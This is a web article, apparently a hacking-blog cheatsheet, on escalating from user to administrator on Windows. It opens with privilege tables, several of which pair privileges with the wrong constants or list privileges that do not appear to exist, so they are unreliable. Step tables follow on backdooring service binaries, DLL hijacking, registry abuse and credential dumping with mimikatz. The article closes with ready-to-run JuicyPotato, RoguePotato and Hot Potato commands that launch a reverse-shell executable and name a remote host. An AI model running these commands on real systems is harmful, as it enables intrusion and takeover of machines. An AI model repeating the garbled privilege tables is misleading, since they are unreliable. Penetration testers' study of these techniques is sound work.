
Windows Privilege Escalation Cheatsheet: From User to Admin in Comprehensive Guide
Windows Privilege Escalation is a crucial technique for ethical hackers and security professionals to learn as it allows them to elevate their privileges on a Windows system and gain access to sensiti
Windows Privilege Escalation is a crucial technique for ethical hackers and security professionals to learn as it allows them to elevate their privileges on a Windows system and gain access to sensitive information or execute unauthorized actions. This Cheatsheet is a comprehensive guide to Windows Privilege Escalation that outlines various techniques for exploiting weak service permissions, unquoted service paths, DLL hijacking, weak registry permissions, insecure service startup, weak file permissions, weak credentials, and AlwaysInstallElevated. By following this Cheatsheet, security professionals can better understand how to identify and exploit Windows Privilege Escalation vulnerabilities to secure their own systems or to conduct ethical hacking activities.
Note that this is not an exhaustive list and there may be other privileges available depending on the version of Windows and the specific configuration of the system.
Desktop view recommended in mobile
Security Management Privileges
| Privilege Name | Constant Name | Description |
|---|---|---|
| Assign Primary Token | SE_ASSIGNPRIMARYTOKEN_NAME | Allows a process to replace the token that represents a client with another token. |
| Backup | SE_BACKUP_NAME | Allows a user or process to bypass file and directory permissions to back up the system. |
| Restore | SE_RESTORE_NAME | Allows a user or process to bypass file and directory permissions to restore the system. |
| Security | SE_SECURITY_NAME | Allows a user or process to modify security settings of objects, such as files, directories, and registry keys. |
System Privileges
| Privilege Name | Constant Name | Description |
|---|---|---|
| Change Notify | SE_CHANGE_NOTIFY_NAME | Allows a user or process to receive notifications when a file or directory is changed. |
| Debug | SE_DEBUG_NAME | Allows a user or process to debug another process. |
| Shutdown | SE_SHUTDOWN_NAME | Allows a user or process to shut down the system. |
| System Time | SE_SYSTEMTIME_NAME | Allows a user or process to modify the system time. |
| Take Ownership | SE_TAKE_OWNERSHIP_NAME | Allows a user or process to take ownership of files, directories, and other objects. |
User Rights
| User Right | Constant Name | Description |
|---|---|---|
| Access Credential Manager | SeInteractiveLogonRight | Allows a user to manage credentials, such as usernames and passwords, stored on the computer. |
| Change the System Time | SeSystemtimePrivilege | Allows a user to modify the system time. |
| Log on as a batch job | SeBatchLogonRight | Allows a user to log on as a batch job, which is a set of instructions that are processed in sequence, without requiring user interaction. |
| Log on as a service | SeServiceLogonRight | Allows a user to log on as a service, which is a program that runs in the background and provides a specific function to other programs or users. |
| Remote Desktop Services | SeRemoteInteractiveLogonRight | Allows a user to connect to the computer using Remote Desktop. |
| Restore Files and Directories | SeRestorePrivilege | Allows a user to restore files and directories, which is useful for recovering data that has been accidentally deleted or corrupted. |
| Shut down the system | SeShutdownPrivilege | Allows a user to shut down the system. |
| Take ownership of files or other objects | SeTakeOwnershipPrivilege | Allows a user to take ownership of files, directories, and other objects. |
Process Management Privileges
| Privilege Name | Constant Name | Description |
|---|---|---|
| Create Process | SE_CREATE_PROCESS_NAME | Allows a user or process to create a new process. |
| Create Thread | SE_CREATE_THREAD_NAME | Allows a user or process to create a new thread within a process. |
| Debug Process | SE_DEBUG_NAME | Allows a user or process to debug another process. |
| Set Session ID | SE_ASSIGNPRIMARYTOKEN_NAME | Allows a user or process to set the session identifier (ID) for a process. |
| Terminate Process | SE_TERMINATE_NAME | Allows a user or process to terminate a process. |
Network Privileges
| Privilege Name | Constant Name | Description |
|---|---|---|
| Access Network Connections | SE_NETWORK_NAME | Allows a user or process to access network-related information, such as the network address of a computer. |
| Impersonate a Client | SE_IMPERSONATE_NAME | Allows a user or process to impersonate another user, which means that the user or process can act as if it were the other user. This is useful for accessing network resources that are restricted to a particular user. |
| Manage auditing and security log | SE_AUDIT_NAME | Allows a user or process to manage the security log, which contains records of security-related events, such as logon attempts and file access attempts. |
Miscellaneous Privileges
| Privilege Name | Constant Name | Description |
|---|---|---|
| Act as part of the operating system | SE_TCB_NAME | Allows a user or process to perform actions that are normally reserved for the operating system, such as installing device drivers and modifying system settings. |
| Allow log on locally | SeInteractiveLogonRight | Allows a user to log on locally to the computer. |
| Bypass traverse checking | SeChangeNotifyPrivilege | Allows a user or process to bypass checks that prevent the user or process from accessing files and directories that are located outside of the user's or process's scope. |
| Increase scheduling priority | SE_INC_BASE_PRIORITY_NAME | Allows a user or process to increase the scheduling priority of a process, which means that the process will be given more resources, such as CPU time, than other processes. |
| Load and unload device drivers | SE_LOAD_DRIVER_NAME | Allows a user or process to load and unload device drivers, which are programs that interact with hardware devices, such as printers and disk drives. |
| Lock pages in memory | SE_LOCK_MEMORY_NAME | Allows a user or process to lock pages in memory, which means that the pages cannot be paged out to the paging file. This is useful for programs that need to access data quickly and efficiently. |
| Profile system performance | SE_PROF_SINGLE_PROCESS_NAME | Allows a user or process to profile the performance of a single process, which means that the user or process can collect data about how much CPU time, memory, and other resources the process is using. |
Security and User Rights Privileges
| Privilege Name | Constant Name | Description |
|---|---|---|
| Add workstations to domain | SeMachineAccountPrivilege | Allows a user or process to add computers to a domain. |
| Backup files and directories | SeBackupPrivilege | Allows a user or process to back up files and directories on the computer. |
| Change the system time | SeSystemtimePrivilege | Allows a user or process to change the system time on the computer. |
| Generate security audits | SeAuditPrivilege | Allows a user or process to generate security-related audit messages in the Security log. |
| Manage auditing and security log | SeSecurityPrivilege | Allows a user or process to manage the security log, which contains records of security-related events, such as logon attempts and file access attempts. |
| Modify firmware environment values | SeSystemEnvironmentPrivilege | Allows a user or process to modify the firmware environment variables on the computer, which are used to store configuration information for hardware devices. |
| Restore files and directories | SeRestorePrivilege | Allows a user or process to restore files and directories on the computer. |
| Take ownership of files or other objects | SeTakeOwnershipPrivilege | Allows a user or process to take ownership of files or other objects on the computer. This is useful for recovering access to files or directories that have been locked down or for troubleshooting permissions issues. |
Service Privileges
| Privilege Name | Constant Name | Description |
|---|---|---|
| Create a token object | SeCreateTokenPrivilege | Allows a user or process to create a token object, which is an object that contains security-related information, such as the user's or process's identity and group memberships. This is useful for creating a new process with specific security settings. |
| Manage the backup and restore privileges | SeBackupPrivilege | Allows a user or process to manage the backup and restore privileges, which are used to back up and restore files and directories on the computer. |
| Query Service Status | SeQueryServiceStatusPrivilege | Allows a user or process to query the status of a service, which is a program that runs in the background and provides functionality to other programs. |
| Start a service | SeServiceLogonRight | Allows a user or process to start a service, which is a program that runs in the background and provides functionality to other programs. |
| Stop a service | SeServiceLogonRight | Allows a user or process to stop a service, which is a program that runs in the background and provides functionality to other programs. |
Virtualization Privileges
| Privilege Name | Constant Name | Description |
|---|---|---|
| Create a virtual machine | SeCreateVirtualMachinePrivilege | Allows a user or process to create a virtual machine, which is a software emulation of a computer system. This is useful for running multiple operating systems or applications on a single computer or for creating test environments. |
| Modify firmware settings | SeSystemEnvironmentPrivilege | Allows a user or process to modify the computer's firmware settings, such as the boot order or startup configuration. This is useful for administrators who need to configure the computer's firmware or for troubleshooting issues related to the computer's startup process. |
Remote Desktop Privileges
| Privilege Name | Constant Name | Description |
|---|---|---|
| Allow logon through Remote Desktop Services | SeRemoteInteractiveLogonRight | Allows a user to log on to a remote computer using Remote Desktop. This privilege is required for users who want to connect to a remote computer using Remote Desktop. |
| Deny logon through Remote Desktop Services | SeDenyRemoteInteractiveLogonRight | Denies a user the ability to log on to a remote computer using Remote Desktop. This privilege is useful for administrators who want to restrict Remote Desktop access to certain users or groups. |
Backup and Restore Privileges
| Privilege Name | Constant Name | Description |
|---|---|---|
| Back up files and directories | SeBackupPrivilege | Allows a user or process to back up files and directories, which means that the user or process can create backups of files and directories even if they do not have explicit permissions to access them. This is useful for backup and disaster recovery purposes. |
| Restore files and directories | SeRestorePrivilege | Allows a user or process to restore files and directories, which means that the user or process can restore backups of files and directories to their original locations. This is useful for restoring data that has been lost or damaged. |
Cryptography Privileges
| Privilege Name | Constant Name | Description |
|---|---|---|
| Create a pagefile | SeCreatePagefilePrivilege | Allows a user or process to create a pagefile, which is a file on disk that is used to store data that does not fit into physical memory. This is useful for improving system performance by providing additional virtual memory. |
| Manage volumes | SeManageVolumePrivilege | Allows a user or process to manage volumes, which are logical partitions on a disk. This is useful for managing disk space, creating new volumes, or troubleshooting issues related to disk management. |
Exploiting Weak Service Permissions
| Technique | Description |
|---|---|
Find weak service permissions using tools like accesschk.exe or sc.exe | Search for services with weak file or registry permissions |
| Modify service binary or configuration file to include a backdoor | Replace the service binary or configuration file with a backdoored version |
| Start the service and gain elevated privileges | Start the vulnerable service to execute the backdoor with elevated privileges |
Exploiting Unquoted Service Paths
| Technique | Description |
|---|---|
Identify services with unquoted service paths using wmic service get name, displayname, pathname, startmode command | Search for services with unquoted service paths |
| Create a malicious file with the same name as the vulnerable service and place it in the directory specified by the service path | Create a malicious file and place it in a directory that the vulnerable service searches for executable files |
| Start the vulnerable service to execute the malicious file with elevated privileges | Start the vulnerable service to execute the backdoor with elevated privileges |
Exploiting DLL Hijacking
| Technique | Description |
|---|---|
Identify vulnerable applications using tools like procmon.exe or dependencywalker.com | Search for applications that load DLLs with a predictable name from a directory that is writable by the attacker |
| Create a malicious DLL with the same name as the vulnerable DLL and place it in a directory that the application searches for DLLs | Create a malicious DLL and place it in a directory that the vulnerable application searches for DLLs |
| Start the vulnerable application to execute the malicious DLL with elevated privileges | Start the vulnerable application to execute the backdoor with elevated privileges |
Exploiting Weak Registry Permissions
| Technique | Description |
|---|---|
Find weak registry permissions using tools like accesschk.exe or regedit.exe | Search for registry keys with weak permissions |
| Modify a registry key to include a backdoor | Modify a vulnerable registry key to include a backdoor |
| Restart the system to gain elevated privileges | Restart the system to execute the backdoor with elevated privileges |
Exploiting Insecure Service Startup
| Technique | Description |
|---|---|
Find services that run with high privileges using tools like sc.exe, tasklist.exe, or task manager | Search for services that run with high privileges and can be stopped and started by non-administrative users |
| Stop the service and replace the binary or configuration file with a backdoored one | Stop the vulnerable service and replace the binary or configuration file with a backdoored version |
| Start the service to execute the backdoor with elevated privileges | Start the vulnerable service to execute the backdoor with elevated privileges |
Exploiting Weak File Permissions
| Technique | Description |
|---|---|
Find files with weak permissions using tools like accesschk.exe or cacls.exe | Search for files with weak permissions that are executed by an administrator |
| Modify the file to include a backdoor | Modify the vulnerable file to include a backdoor |
| Wait for an administrator to execute the file to gain elevated privileges | Wait for an administrator to execute the vulnerable file and execute the backdoor with elevated privileges |
Exploiting Weak Credentials
| Technique | Description |
|---|---|
Find weak credentials using tools like hashdump.exe, mimikatz.exe, or metasploit-framework | Search for weak or default credentials |
| Use the credentials to gain administrative access to the system | Use the obtained credentials to gain administrative access to the system |
Exploiting Clear Text password
| Technique | Description |
|---|---|
| Identify services, applications or scripts that store passwords in clear text | Search for clear text passwords in configuration files, scripts, or memory dumps using tools like grep or strings |
| Extract the clear text password | Extract the password from the configuration file, script, or memory dump using tools like awk, sed, or python |
| Use the obtained credentials to gain administrative access to the system | Use the obtained credentials to gain administrative access to the system |
Note: It's important to note that exploiting clear text passwords is not recommended as it is a significant security risk. It is important to use secure password storage methods, such as encryption or hashing, to protect sensitive information.
Dangerous User Privileges
Some privileges for a user is dangerous. They could lead to escalate to higher privilege I will list some of them:
SEImpersonatePrivilege
It can act as any other user, such as, Administrator. The vulnerability could be exploited with JuicyPotato
SeAssignPrimaryPrivilege
Assign an access token to new process. Can be exploited with JuicyPotato
SeBackUpPrivilege
If a user has this privilege he is able to read files. That’s mean the user can extract password/hash from registry which could be used for pass-the-hash attack
SeRestorePrivilege
This privilege grant a user to modify service binary, dll, also modify registry settings
Others risky Privilege
- SeCreateTokenPrivilege
- SeLoadDriverPrivilege
- SeDebugPrivilege
Hot Potato Exploit
A Tutorial: https://pentestlab.blog/2017/04/13/hot-potato/
Windows 7
.\Potato.exe -ip <local ip> -cmd <command to run> -enable_defender true -enable_spoof true -disable_exhaust true
Windows 10
.\Potato.exe -ip <local ip> -cmd <cmd to run> -disable_exhaust true -disable_defender true
Juicy Potato
If SeImpersonate/SeAssignPrimaryToken JuicyPotato can be used to escalated privilege.
Note: CLSID can be found in: https://github.com/ohpe/juicy-potato/blob/master/CLSID/README.md
JuicyPotato.exe -l 4444 -p C:\Windows\Temp\Rev.exe -t * -c {CLS_ID}
Rogue Potato
Just another Windows Local Privilege Escalation from Service Account to System. So the requirement is the accessed account needed to be a service account.
.\RoguePotato.exe -r 192.168.1.11 –l 9999 -e "C:\Windows\Temp\rev.exe
Related Articles
Social Media Hacking - What Is Phishing?
Phishing is a type of social engineering attack in which hackers attempt to trick users into giving them sensitive infor
List of resources to learn Bash from complete beginner to advanced level
Bash (short for Bourne Again SHell) is a Unix shell and command language that is widely used by developers and system ad
What is Open Source Intelligence: A Detailed Guide
Open Source Intelligence, commonly known as OSINT, refers to the information that can be gathered from publicly availabl
Linux Privilege Escalation: DirtyPipe (CVE 2022-0847)
CVE 2022-0847 is a privilege escalation vulnerability discovered by Max Kellerman present in Linux Kernel itself post ve
Best Beginner JavaScript Projects for Hacking (2026 Guide)
If you want to break into web security, building the best beginner JavaScript projects for hacking is the most effective
How to Get Into Cybersecurity and Carve a Career Path (Without Lying to Yourself)
Let’s start with the hard truth you already suspect: most advice about starting a cybersecurity career is garbage. It’s
COMMENTS (0)
Sign in to post intel on this briefing.